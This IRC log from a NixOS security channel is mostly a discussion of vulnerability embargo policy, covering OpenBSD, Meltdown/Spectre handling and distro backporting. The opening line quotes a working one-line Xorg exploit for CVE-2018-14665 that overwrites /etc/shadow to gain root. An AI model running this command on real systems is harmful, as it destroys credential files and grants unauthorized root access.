<pie__>
#CVE-2018-14665 - a LPE exploit via http://X.org fits in a tweet cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su Overwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected.
<ekleog>
I don't really understand that ML post… holding off the release would have been breaking the embargo
<ekleog>
which would completely break the idea of an embargo
<ekleog>
also, the idea of an embargo is to prepare patch so that everyone gets them out at the same time, given OpenBSD had a maintainer in the Xorg team it means they could get the patch ASAP… so IMO the embargo did meet its purpose, even though 14 days is already pretty long an embargo
<pie__>
1) idk 2) what about "there is a problem, i cant tell you what, but dont release yet"
<ekleog>
that's what led people to figuring out meltdown & spectre before the end of the embargo with the release of an exploit .)
<ekleog>
(well, granted, meltdown&spectre was *really* an ill-handled embargo)
<pie__>
hm
<pie__>
wasnt the patch out for those first
<andi->
I am sick of people trying to be entitle for pre-disclosure information..
<gchristensen>
soo yes
<andi->
I like OpenBSD but this constant crying out...
* andi-
focuses on positive stuff
mmercier has joined #nixos-security
<ekleog>
pie__: well, meltdown&spectre is peculiar in that the embargo lasted months and some patches had already been pushed upstream during the embargo (like the KPTI patchset, that had been loudly ignored by linus for years until the security community started agitating and linux silently pushed them upstream without a single message on the list)
<ekleog>
really an ill-handled embargo
<ekleog>
but I can say with friends we were looking at this for like a week before the embargo was officially aborted :p
<ekleog>
(and the embargo has been aborted because someone released an exploit, iirc, and xen didn't have the patchset ready)
<pie__>
sounds messy :P
<ekleog>
the more I think about the more I think the only person in the embargo should really be the security researcher and the person in charge of writing a patch
<ekleog>
+it
<ekleog>
and ++s
<ekleog>
and then distros should handle backporting the patch and releasing once the embargo is removed -- but I guess the issue is for people like redhat or debian who backport years behind
<andi->
I think that might be dangerousm.. For anyone not Debian or redhat/suse. Often enough there subtile changes that have to get implemented. If you leave that to say us I would be worried about backporting it wrong..
<ekleog>
yeah, I think my position is too extreme too… but well, even backporting needs only be done once, it doesn't require the embargo to go to 17 distros with at least 2 people per distro plus some independent volunteers :/
<ekleog>
(and that's only considering embargoes upheld by distros@ standards, which are already the strictest I know of)
<ekleog>
ideally backporting would be done by the person who makes the patch themselves
<andi->
It starts with packaging and distributing stableish/LTS packages.
<andi->
Upstream then has a defined set of releases that might need a backport. If someone wnats to support that longer then upstream they must do it themselves.. E.g. rustc in our releases
pie__ has quit [Ping timeout: 246 seconds]
mmercier has quit [Ping timeout: 276 seconds]
pie_ has joined #nixos-security
pie_ has quit [Remote host closed the connection]
pie_ has joined #nixos-security
ivan_ is now known as ivan
pie__ has joined #nixos-security
pie_ has quit [Ping timeout: 250 seconds]
mmercier has joined #nixos-security
mmercier has quit [Quit: mmercier]
pie__ has quit [Ping timeout: 272 seconds]
pie_ has joined #nixos-security
pie_ has quit [Remote host closed the connection]
pie_ has joined #nixos-security
pie_ has quit [Ping timeout: 240 seconds]
pie_ has joined #nixos-security
pie__ has joined #nixos-security
pie_ has quit [Client Quit]
pie_ has joined #nixos-security
pie__ has quit [Remote host closed the connection]